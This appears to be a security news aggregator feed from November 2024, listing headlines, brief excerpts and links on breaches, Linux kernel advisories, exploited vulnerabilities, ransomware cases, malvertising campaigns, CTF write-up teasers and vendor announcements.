DeepTempo's Tempo is a deep learning-based Snowflake native app that allows organizations to detect and respond to evolving threats directly within their Snowflake environments.
https://www.darkreading.com/cybersecurity-operations/untitled

How HackerOne Employees Stay Connected and Have Fun

https://www.hackerone.com/culture-and-talent/how-hackerone-employees-stay-connected-and-have-fun

Fintech Giant Finastra Investigating Data Breach
The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned. Finastra, which provides software and services to 45 of the world's top 50 banks, notified customers of a potential breach after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
https://krebsonsecurity.com/2024/11/fintech-giant-finastra-investigating-data-breach/

RIIG Launches With Risk Intelligence Solutions
RIIG is a risk intelligence and cybersecurity solutions provider offering open source intelligence solutions designed for zero-trust environments.
https://www.darkreading.com/cyber-risk/riig-launches-risk-intelligence-solutions

SWEEPS Educational Initiative Offers Application Security Training
The secure coding curriculum, funded by a .5 million grant, is available for students and professionals at all stages of their careers.
https://www.darkreading.com/application-security/sweeps-educational-initiative-application-security-training

News from two days ago (specialised press)

USN-7122-1: Linux kernel vulnerability
A security issue was discovered in the Linux kernel. An attacker could possibly use this to compromise the system. This update corrects flaws in the following subsystems:
- x86 architecture;
https://ubuntu.com/security/notices/USN-7122-1

USN-7121-1: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- ARM64 architecture;
- S390 architecture;
- x86 architecture;
- Block layer subsystem;
- Cryptographic API;
- ATM drivers;
- Device frequency scaling framework;
- GPU drivers;
- Hardware monitoring drivers;
- VMware VMCI Driver;
- Network drivers;
- Device tree and open firmware driver;
- SCSI drivers;
- Greybus lights staging drivers;
- BTRFS file system;
- File systems infrastructure;
- F2FS file system;
- JFS file system;
- NILFS2 file system;
- Netfilter;
- Memory management;
- Ethernet bridge;
- IPv6 networking;
- IUCV driver;
- Logical Link layer;
- MAC80211...
https://ubuntu.com/security/notices/USN-7121-1

USN-7120-1: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- File systems infrastructure;
- Network traffic control;
(CVE-2024-46800, CVE-2024-43882)
https://ubuntu.com/security/notices/USN-7120-1

USN-7119-1: Linux kernel (IoT) vulnerabilities
Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2022-36402)
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- ARM64 architecture;
- PowerPC architecture;
- User-Mode Linux (UML);
- x86 architecture;
- Block layer subsystem;
- Cryptographic API;
- Android drivers;
- Serial ATA and Parallel ATA drivers;
- ATM drivers;
- Drivers core;
- CPU frequency scaling framework;
- Device frequency scaling framework;
- GPU drivers;
- HID subsystem;
- Hardware monitoring drivers;
- InfiniBand...
https://ubuntu.com/security/notices/USN-7119-1

Russian Phobos ransomware operator faces cybercrime charges
Russian Phobos ransomware operator Evgenii Ptitsyn, accused of managing attacks, was extradited from South Korea to the US to face cybercrime charges. Russian Phobos ransomware operator Evgenii Ptitsyn, suspected of playing a key role in the ransomware operations, was extradited from South Korea to the US to face cybercrime charges. According to the DoJ, the […]
https://securityaffairs.com/171184/cyber-crime/phobos-ransomware-operator-faces-cybercrime-charges.html

USN-7089-7: Linux kernel (Low Latency) vulnerabilities
Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. (CVE-2024-25741)
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems:
- ARM32 architecture;
- MIPS architecture;
- PA-RISC architecture;
- PowerPC architecture;
- RISC-V architecture;
- S390 architecture;
- x86 architecture;
- Cryptographic API;
- Serial ATA and Parallel ATA drivers;
- Null block device driver;
- Bluetooth drivers;
- Cdrom driver;
- Clock framework and drivers;
- Hardware crypto device drivers;
- CXL (Compute...
https://ubuntu.com/security/notices/USN-7089-7

Apple fixes two zero-days used in attacks on Intel-based Macs
Apple released emergency security updates to fix two zero-day vulnerabilities that were exploited in attacks on Intel-based Mac systems. [...]
https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/

Linux Variant of Helldown Ransomware Targets VMware ESXi Systems
Since surfacing in August, the likely LockBit variant has claimed more than two dozen victims and appears poised to strike many more.
https://www.darkreading.com/cyberattacks-data-breaches/linux-variant-helldown-ransomware-targets-vmware

CISA tags Progress Kemp LoadMaster flaw as exploited in attacks
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three new flaws in its Known Exploited Vulnerabilities (KEV) catalog, including a critical OS command injection impacting Progress Kemp LoadMaster. [...]
https://www.bleepingcomputer.com/news/security/cisa-tags-progress-kemp-loadmaster-flaw-as-exploited-in-attacks/

AI-Powered Cybersecurity: Safeguarding the Media Industry
Written by Satyavathi Divadari, Founder and President of the CSA Bangalore Chapter, in collaboration with the AI Technology and Risk Working Group. In the fast-paced world of media, where delivering authentic news quickly is essential, cybersecurity plays a critical role in protecting data, ensuring privacy, and upholding journalistic standards. With my experience as a Director of Cybersecurity for a media company, I've observed the complexities of implementing cybersecurity in the media indus...
https://cloudsecurityalliance.org/articles/ai-powered-cybersecurity-safeguarding-the-media-industry

5 Big Cybersecurity Laws You Need to Know About Ahead of 2025
Originally published by Schellman. Written by Jordan Hicks. Generally, with new cybersecurity regulations, organizations affected are provided a "grace period" to make the necessary adjustments to achieve full compliance before enforcement begins. Looking toward the horizon and 2025, many new laws will be coming into full effect, which means organizations will now likely be subject to various penalties if they're not ready and haven't satisfied all relevant requirements. So, are you ready? We kn...
https://cloudsecurityalliance.org/articles/5-big-cybersecurity-laws-you-need-to-know-about-ahead-of-2025

An Easy P4 in 10 min: The Story of Finding an Interesting Vulnerability in a VDP program
In the world of cybersecurity, vulnerabilities can lead to severe consequences for organizations and their users. A recent discovery of a No Rate Limiting vulnerability in the PickMyCareer web application has raised alarms due to its potential for abuse, including database hijacking and SMS flooding. This blog will explore the details of this vulnerability, its impact, and the importance of implementing proper security measures to mitigate such risks.
Overview of the Vulnerability
Vulnerability Name: No Rate Limiting
Description: The absence of rate limiting in the registration endpoint allows an attacker to create an excessive number of accounts rapidly, over 10,000 accounts in less than a minute. This vulnerability can be exploited to hijack database storage and take advantage of SMTP...
https://infosecwriteups.com/the-story-of-finding-and-mitigating-no-rate-limiting-vulnerability-in-pickmycareer-7b2653d18bbc?source=rss----7b722bfd1b8d---4

HTB — Included
Can you enumerate your way to the top? Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/htb-included-cba3eb482413?source=rss----7b722bfd1b8d---4

Leviathan6 : Over The Wire
Overview
Leviathan Level 6 is part of the OverTheWire CTF (Capture The Flag) challenges, designed to enhance your understanding of Linux command-line tools, basic scripting, and reverse engineering. In this level, the player is tasked with finding a 4-digit password to progress to the next level. The executable `leviathan6` prompts the user for this password, and the challenge lies in discovering the correct code through brute force or analysis.
Objective
The main goal is to execute the `leviathan6` binary located in the user's home directory and provide it with the correct 4-digit code. Successfully entering this code allows access to the next level, `leviathan7`.
Initial Exploration
This indicates that the program requires a 4-digit code as an argument.
Brute-Forcing...
https://infosecwriteups.com/leviathan6-over-the-wire-1f2363918462?source=rss----7b722bfd1b8d---4

A Step-by-Step Walkthrough of the Netsquare CTF Challenge
Hello Everyone, My name is Praveen Mali (PMMALI), and I am a Cybersecurity Analyst. Today, I am excited to share the write-up for a Capture The Flag (CTF) challenge I created for our organization. In this CTF, I designed both web and network-based challenges. As the creator of this CTF, I've thoroughly crafted each challenge to engage participants with different attack vectors and vulnerabilities. Now, I'm writing this walkthrough from the perspective of a participant, outlining the steps to solve each challenge and ultimately capture all the flags. To begin, download the OVA file from the provided link, install it, and set it up on your local machine. Make sure to configure the network adapter in the settings. Once the setup is complete, you're ready to get started. For this write-up,...
https://infosecwriteups.com/a-step-by-step-walkthrough-of-the-netsquare-ctf-challenge-58212b63d44b?source=rss----7b722bfd1b8d---4

Defending Web Portals: Harnessing ModSecurity, Honeypots, and AppSensor for Robust Security
Modern cybersecurity isn't just about building impenetrable walls; it's about sounding the alarm the moment someone tries to climb over. The modern web landscape is fraught with evolving and increasingly sophisticated threats targeting web portals and applications. Cybercriminals exploit vulnerabilities through automated bot attacks, advanced penetration testing, and targeted manual exploits. To effectively defend against these threats, a multi-layered approach is essential, one that combines proactive defense mechanisms, intelligent monitoring, and real-time response systems. In this journal, we delve into a holistic defense strategy for protecting web portals. By combining ModSecurity (a web application firewall), Application-Level Honeypots, and OWASP AppSensor, organizations...
https://infosecwriteups.com/defending-web-portals-harnessing-modsecurity-honeypots-and-appsensor-for-robust-security-38526db8593d?source=rss----7b722bfd1b8d---4

Ford rejects breach allegations, says customer data not impacted
Ford is investigating allegations that it suffered a data breach after a threat actor claimed to leak 44,000 customer records on a hacking forum. [...]
https://www.bleepingcomputer.com/news/security/ford-rejects-breach-allegations-says-customer-data-not-impacted/

Oracle warns of Agile PLM file disclosure flaw exploited in attacks
Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was actively exploited as a zero-day to download files. [...]
https://www.bleepingcomputer.com/news/security/oracle-warns-of-agile-plm-file-disclosure-flaw-exploited-in-attacks/

The Lost Art of Visibility, in the World of Clouds
Written by Vito Nozza, Softchoice. "The power of visibility can never be underestimated" (Margaret Cho). As many of you have read my past blogs, I like to quote individuals who have had experience in certain subjects. Although the above quote was meant for a different context, it bears true for this conversation. The value in the adoption of cloud-based services has skyrocketed over the last 10 years. The ability for companies to utilize the cloud's flexible, scalable, and cost-effective computing...
https://cloudsecurityalliance.org/articles/the-lost-art-of-visibility-in-the-world-of-clouds

Russian Ransomware Gangs on the Hunt for Pen Testers
In further proof of the professionalization of Russian cybercriminal groups, ransomware gangs have been posting job ads for security positions such as pen testers, looking to boost their ransomware deployment operations.
https://www.darkreading.com/vulnerabilities-threats/russian-ransomware-gangs-hunt-pen-testers

USN-7117-1: needrestart and Module::ScanDeps vulnerabilities
Qualys discovered that needrestart passed unsanitized data to a library (libmodule-scandeps-perl) which expects safe input. A local attacker could possibly use this issue to execute arbitrary code as root. (CVE-2024-11003)
Qualys discovered that the library libmodule-scandeps-perl incorrectly parsed perl code. This could allow a local attacker to execute arbitrary shell commands. (CVE-2024-10224)
Qualys discovered that needrestart incorrectly used the PYTHONPATH environment variable to spawn a new Python interpreter. A local attacker could possibly use this issue to execute arbitrary code as root. (CVE-2024-48990)
Qualys discovered that needrestart incorrectly checked the path to the Python interpreter. A local attacker could possibly use this issue to win a race condition and execute...
https://ubuntu.com/security/notices/USN-7117-1

Rapid7 Recognized for ‘Excellence in Workplace Health and Wellbeing' at the Belfast Telegraph IT Awards
On Friday, November 15th, Rapid7 was awarded ‘Excellence in Workplace Health and Wellbeing' at the Belfast Telegraph IT Awards. This award recognizes technology companies in Belfast that prioritize employee well-being.
https://blog.rapid7.com/2024/11/19/rapid7-recognized-for-excellence-in-workplace-health-and-wellbeing-at-the-belfast-telegraph-it-awards/

From Concept to Launch: Ensuring Cybersecurity in Product Development
Developing a new product requires coordinating many moving parts, from initial conception to final launch.… From Concept to Launch: Ensuring Cybersecurity in Product Development on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/19/from-concept-to-launch-ensuring-cybersecurity-in-product-development/

Russian Man Extradited to US, Faces Charges in Phobos Ransomware Operation
Russian national Evgenii Ptitsyn, linked to Phobos ransomware, faces U.S. charges for extortion and hacking, with over M…
https://hackread.com/russian-hacker-extradite-us-phobos-ransomware-charges/

Legit Secrets Detection & Prevention: Free 14-Day Trial Now Available!
Get a free trial of the Legit secrets scanner to understand the capabilities of modern secrets scanning. 
https://www.legitsecurity.com/blog/legit-secrets-detection-prevention-free-trial

China-linked actor's malware DeepData exploits FortiClient VPN zero-day
Chinese threat actors use custom post-exploitation toolkit ‘DeepData’ to exploit FortiClient VPN zero-day and steal credentials. Volexity researchers discovered a vulnerability in Fortinet’s Windows VPN client that China-linked threat actor BrazenBamboo abused in their DEEPDATA malware. BrazenBamboo is known to be the author of other malware families, including LIGHTSPY, DEEPDATA, and DEEPPOST. DEEPDATA is a […]
https://securityaffairs.com/171173/security/china-linked-actors-malware-deepdata-exploits-forticlient-vpn-zero-day.html

Weekly Detection Rule (YARA and Snort) Information – Week 3, November 2024
The following is the information on YARA and Snort rules (week 3, November 2024) collected and shared by the AhnLab TIP service. 1 YARA Rules: MAL_ELF_Xlogin_Nov24_1 (description: detects xlogin backdoor samples; source: https://github.com/Neo23x0/signature-base). 4 Snort Rules: ET WEB_SPECIFIC_APPS Symphony PHP Symfony Profiler Environment Manipulation (CVE-2024-50340) (source: https://rules.emergingthreatspro.com/open/); ET WEB_SPECIFIC_APPS Citrix Session […] The post Weekly Detection Rule (YARA and Snort) Information – Week 3, November 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84652/

Free AI editor lures in victims, installs information stealer instead on Windows and Mac
A widespread social media campaign for EditProAI turns out to spread information stealers for both Windows and MacOS users.
https://www.malwarebytes.com/blog/news/2024/11/free-ai-editor-lures-in-victims-installs-information-stealer-instead-on-windows-and-mac

HackTheBox Writeup — Easy Machine Walkthrough
HTB Guided Mode Walkthrough. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/hackthebox-writeup-easy-machine-walkthrough-a99d7696dd62?source=rss----7b722bfd1b8d---4

Pivoting in Penetration Testing: A Comprehensive Guide
Pivoting is a vital technique in penetration testing that allows an attacker to exploit a compromised system to access deeper layers of a target network. It's the art of leveraging initial access to one machine to explore, exploit, and gain control over other machines in the same network. This guide delves into the essentials of pivoting, providing practical techniques and tools to enhance your understanding. Why Pivoting is Essential? Most networks are segmented, with sensitive systems hidden behind layers of security. Initial access, such as exploiting a public-facing server, rarely grants direct access to critical systems. Pivoting bridges this gap, enabling lateral movement within the network to target these hidden assets. Example Scenario: Imagine a network with four machines: One public-facing...
https://infosecwriteups.com/pivoting-in-penetration-testing-a-comprehensive-guide-cfa090e45ee0?source=rss----7b722bfd1b8d---4

Rethinking Cybersecurity From Cost Center To Value Driver
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Forbes Story. Sausalito, Calif. – Nov. 19, 2024. Historically, many businesses have approached cybersecurity as a checkbox exercise: invest just enough to comply with regulations (and avoid a fine) and protect against… The post Rethinking Cybersecurity From Cost Center To Value Driver appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/rethinking-cybersecurity-from-cost-center-to-value-driver/

Accelerate Mean Time to Exposure Remediation Across Hybrid Environments with Remediation Hub
Rapid7's Remediation Hub, our newest addition to the Exposure Command platform. Remediation Hub automatically prioritizes various risk signals across your hybrid environment and suggests the actions your team can take that would have the largest impact on reducing your overall risk posture.
https://blog.rapid7.com/2024/11/19/accelerate-mean-time-to-exposure-remediation-across-hybrid-environments-with-remediation-hub/

Communication platforms play a major role in data breach risks
Every online activity or task brings at least some level of cybersecurity risk, but some have more risk than others. Kiteworks Sensitive Content Communications Report found that this is especially true when it comes to using communication tools. When it comes to cybersecurity, communicating means more than just talking to another person; it includes any […] The post Communication platforms play a major role in data breach risks appeared first on Security Intelligence.
https://securityintelligence.com/articles/communication-platforms-major-role-in-data-breach-risks/

Enhancing Traveler Data Security: Best Practices for Managing Sensitive Info
Protect traveler data with these tips: use VPNs, manage app permissions, and secure travel documents. Travel companies should…
https://hackread.com/traveler-data-security-practices-managing-sensitive-info/

AI is everywhere, and Boomers don't trust it
ChatGPT, Google Gemini, and Meta AI may be everywhere, but Baby Boomers don't trust the tech or the companies behind it.
https://www.malwarebytes.com/blog/news/2024/11/ai-is-everywhere-and-boomers-dont-trust-it

Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team had uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […] The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report

AI innovations for a more secure future unveiled at Microsoft Ignite
Company delivers advances in AI and posture management, unprecedented bug bounty program, and updates on its Secure Future Initiative. The post AI innovations for a more secure future unveiled at Microsoft Ignite appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/19/ai-innovations-for-a-more-secure-future-unveiled-at-microsoft-ignite/

Critical Windows Kerberos Flaw Exposes Millions of Servers to Attack
A critical vulnerability in the Windows Kerberos authentication protocol poses a significant risk to millions of servers. Microsoft…
https://hackread.com/windows-kerberos-flaw-millions-of-servers-attack/

Maintaining File Security While Working Remotely
These days remote workers in home offices using residential WiFi must maintain a similar security posture as a full-on corporation while working with other remote stakeholders, clients, and partners anywhere... The post Maintaining File Security While Working Remotely appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/maintaining-file-security-while-working-remotely/

Cloud Security Alliance Announces Winners of the 2024 Juanita Koilpillai Awards
Award honors volunteers for their valuable contributions towards fulfilling CSA's mission of promoting best practices to help ensure a secure cloud computing environment. SEATTLE – Nov. 20, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment, is pleased to announce the winners of the 2024 Juanita Koilpillai Award. The award, first established in 2012 as the Ro...
https://cloudsecurityalliance.org/articles/csa-announces-winners-of-the-2024-juanita-koilpillai-awards

FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications
We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications. The post FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications appeared first on Unit 42.
https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/

Unlocking the Power and Potential of GenAI in Software Development
As GenAI becomes an indispensable tool in software development, organizations are embracing its ability to drive innovation and streamline operations. But this rapid adoption brings with it significant challenges in security, governance, and visibility. 
https://www.legitsecurity.com/blog/unlocking-the-power-and-potential-of-genai-in-software-development

Scammer Black Friday offers: Online shopping threats and dark web sales
Kaspersky experts share their insights into cyberthreats that face online shoppers in 2024: phishing, banking trojans, fake shopping apps and Black Friday sales on the dark web data market.
https://securelist.com/black-friday-report-2024/114589/

What Exactly is Telematics? The Technology That's Changing How We Drive
Telematics is transforming the driving experience by merging telecommunications and informatics to monitor vehicle data… What Exactly is Telematics? The Technology That’s Changing How We Drive on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/19/what-exactly-is-telematics-the-technology-thats-changing-how-we-drive/

U.S. CISA adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the above vulnerabilities: CVE-2024-1212 is a Progress Kemp LoadMaster […]
https://securityaffairs.com/171168/security/u-s-cisa-progress-kemp-loadmaster-palo-alto-networks-pan-os-and-expedition-bugs-known-exploited-vulnerabilities-catalog.html

Great Plains Regional Medical Center ransomware attack impacted 133,000 individuals
A ransomware attack on Great Plains Regional Medical Center compromised personal data of 133,000 individuals, exposing sensitive information. On September 8, 2024, Great Plains Regional Medical Center (Oklahoma) suffered a ransomware attack. The organization launched an investigation into the incident with the help of a cybersecurity firm. The healthcare center discovered that a threat actor […]
https://securityaffairs.com/171156/data-breach/great-plains-regional-medical-center-data-breach.html

Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910)
What is the Vulnerability? CISA has added CVE-2024-5910, a missing authentication vulnerability in Palo Alto Networks Expedition, to its Known Exploited Vulnerabilities (KEV) list. Expedition is a migration tool aiding in configuration migration, tuning, and enrichment from one of the supported vendors to Palo Alto Networks. Successful exploitation of CVE-2024-5910 can lead to an admin account takeover. Configuration secrets, credentials, and other data imported into Expedition are at risk due to this issue. What is the recommended Mitigation? Palo Alto Networks has released security updates to address the vulnerability. This issue is fixed in Expedition 1.2.92 and all later versions. https://security.paloaltonetworks.com/CVE-2024-5910 What is FortiGuard Coverage? FortiGuard recommends users to apply...
https://fortiguard.fortinet.com/threat-signal-report/5575

Finsure - 296,124 breached accounts
In October 2024, almost 300k unique email addresses from Australian mortgage broking group Finsure were obtained from the ActivePipe real estate marketing platform. The impacted data also included names, phone numbers and physical addresses. The incident did not directly affect any of Finsure's systems or expose any passwords or financial data.
https://haveibeenpwned.com/PwnedWebsites#Finsure

How REI Strengthens Security with HackerOne's Global Security Researcher Community
REI's senior application security engineer discusses their program success, evolving goals, and the value of the security researcher community.
https://www.hackerone.com/customer-story/rei-strengthens-security

News from previous days

ASPM vs. CSPM: Key Differences
With dozens of cybersecurity threats out there, maintaining your company's security posture is more important than ever. And with so many types of technology to oversee—from cloud infrastructure to AI-generated code—there are just as many ways to manage your security practices. 
https://www.legitsecurity.com/blog/aspm-vs-cspm

Compliance Automation: How to Get Started and Best Practices
Managing compliance manually is an uphill battle, especially when regulatory requirements are constantly changing.
https://www.legitsecurity.com/blog/compliance-automation-best-practices

Recently disclosed VMware vCenter Server bugs are actively exploited in attacks
Threat actors are actively exploiting two VMware vCenter Server vulnerabilities tracked as CVE-2024-38812 and CVE-2024-38813, Broadcom warns. Broadcom warns that the two VMware vCenter Server vulnerabilities CVE-2024-38812 and CVE-2024-38813 are actively exploited in the wild. “Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.” […]
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html

Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden
A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/

An air fryer, a ring, and a vacuum get brought into a home. What they take out is your data (Lock and Code S05E24)
This week on the Lock and Code podcast, we tell three stories about air fryers, smart rings, and vacuums that want your data.
https://www.malwarebytes.com/blog/uncategorized/2024/11/an-air-fryer-a-ring-and-a-vacuum-get-brought-into-a-home-what-they-take-out-is-your-data-lock-and-code-s05e24

QuickBooks popup scam still being delivered via Google ads
When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads

Purple Team Activities: Where Offense Meets Defense to Strengthen Cyber Resilience
Purple team activities serve as a bridge between red and blue teams, combining offensive tactics with defensive strategies to enhance an organization's overall security posture. Unlike traditional siloed approaches, purple teaming fosters collaboration between attackers (red team) and defenders (blue team) to identify weaknesses, improve detection capabilities, and refine incident response processes. Red Team: The Red Team simulates real-world adversaries to test an organization's defenses. Their main goal is to emulate tactics, techniques, and procedures (TTPs) that an actual attacker might use to breach systems. These activities can include penetration testing, social engineering (e.g., phishing campaigns), or advanced exploitation of vulnerabilities. Purpose: Identify weaknesses in security posture. Approach:...
https://infosecwriteups.com/purple-team-activities-where-offense-meets-defense-to-strengthen-cyber-resilience-82e76fafe76b?source=rss----7b722bfd1b8d---4

IDOR Leading To Improper Access Control
Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/idor-leading-to-improper-access-control-c3999aa28fc4?source=rss----7b722bfd1b8d---4

Women In Cybersecurity On The Cybercrime Magazine Podcast
This week in cybersecurity from the editors at Cybercrime Magazine – Listen To Our Podcast. Sausalito, Calif. – Nov. 18, 2024. Cybersecurity Ventures predicts that women will represent 30 percent of the global cybersecurity workforce by 2025, increasing to 35 percent by 2031, up from 25 percent… The post Women In Cybersecurity On The Cybercrime Magazine Podcast appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/women-in-cybersecurity-on-the-cybercrime-magazine-podcast/

Unlock 24/7 SOC Coverage: Rapid7 MXDR Now Supports with Microsoft Security Products
With the launch of Rapid7 MXDR's SOC support for key Microsoft security products, we're making it possible for organizations to layer security defenses and amplify outcomes.
https://blog.rapid7.com/2024/11/18/unlock-24-7-soc-coverage-rapid7-mxdr-now-supports-with-microsoft-security-products/

Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users/

Illegal Crypto Mining: How Businesses Can Prevent Themselves From Being 'Cryptojacked'
The popularity of cryptocurrencies like Ethereum and Bitcoin surged during the pandemic era. What began as a niche, almost novelty form of payment in the 2010s, transformed into a legitimate... The post Illegal Crypto Mining: How Businesses Can Prevent Themselves From Being 'Cryptojacked' appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/illegal-crypto-mining-how-businesses-can-prevent-themselves-from-being-cryptojacked/

Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions, like medicine or aviation, there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program: a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach.
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships

Preventing refactoring or how to make legacy code something to be proud of
Legacy code has a reputation for being messy, outdated, and a reliable source of frustration.… Preventing refactoring or how to make legacy code something to be proud of on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/18/ready-preventing-refactoring-or-how-to-make-legacy-code-something-to-be-proud-of/

A week in security (November 11 – November 17)
A list of topics we covered in the week of November 11 to November 17 of 2024
https://www.malwarebytes.com/blog/news/2024/11/a-week-in-security-november-11-november-17

Building a Powerful Packet Sniffing Tool with Python
A Practical Guide to Network Traffic Analysis for Developing an Advanced Packet Sniffer. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/building-a-powerful-packet-sniffing-tool-with-python-896545b1fd71?source=rss----7b722bfd1b8d---4

How Ransomware Jeopardizes Healthcare Organizations
Security challenges in the healthcare sector continue to grow as connected assets and attack surfaces expand. Organizations in any sector face financial ramifications in the aftermath of a successful attack,... The post How Ransomware Jeopardizes Healthcare Organizations appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-ransomware-jeopardizes-healthcare-organizations/

High Performance Software Defined Receivers
Introduction As cybersecurity challenges grow more complex, the tools we use to protect data and communications are also advancing. Among these tools, high-performance software defined receivers (SDRs) with tuning ranges... The post High Performance Software Defined Receivers appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/high-performance-software-defined-receivers/

Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
What is the Vulnerability? Microsoft Windows contains an NTLMv2 hash spoofing vulnerability (CVE-2024-43451) that could result in disclosing a user's NTLMv2 hash to an attacker via a file open operation. The attacker can leverage this hash to impersonate that user with minimal interaction from the victim. This vulnerability (CVE-2024-43451) was added to CISA's Known Exploited Vulnerabilities (KEV) catalog on November 12, 2024. What is the recommended Mitigation? Microsoft released a security update to fix the vulnerability on November 12, 2024. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43451 What FortiGuard Coverage is available? FortiGuard recommends users to apply the fix provided by the vendor as soon as possible. FortiGuard IPS protection is available, and...
https://fortiguard.fortinet.com/threat-signal-report/5593

Metasploit Weekly Wrap-Up: 11/15/2024
This week's Metasploit Weekly Wrap-Up includes an exploit module for the Palo Alto Expedition exploit chain that's been making headlines recently.
https://blog.rapid7.com/2024/11/15/metasploit-weekly-wrap-up-43/

The Future of Cybersecurity: Predictions for 2025 and Beyond
by Gary S. Miliefsky, CISSP, fmDHS As the publisher of Cyber Defense Magazine, I have a great honor and pleasure to meet with many of the market leaders and innovators... The post The Future of Cybersecurity: Predictions for 2025 and Beyond appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-future-of-cybersecurity-predictions-for-2025-and-beyond/

Flexible Data Retrieval at Scale with HAQL
HAQL: HackerOne's simplified query interface for writing performant aggregate queries on tables modeled purposefully for data analysis.
https://www.hackerone.com/engineering/haql

Retrofitting spatial safety to hundreds of millions of lines of C++
Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer. Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users. Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade (figure: breakdown of memory safety CVEs exploited in the wild by vulnerability class [1]). Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads...
http://security.googleblog.com/2024/11/retrofitting-spatial-safety-to-hundreds.html

AI in SecOps: How AI is Impacting Red and Blue Team Operations
View survey results and analysis of how AI in SecOps is impacting red and blue team operations.
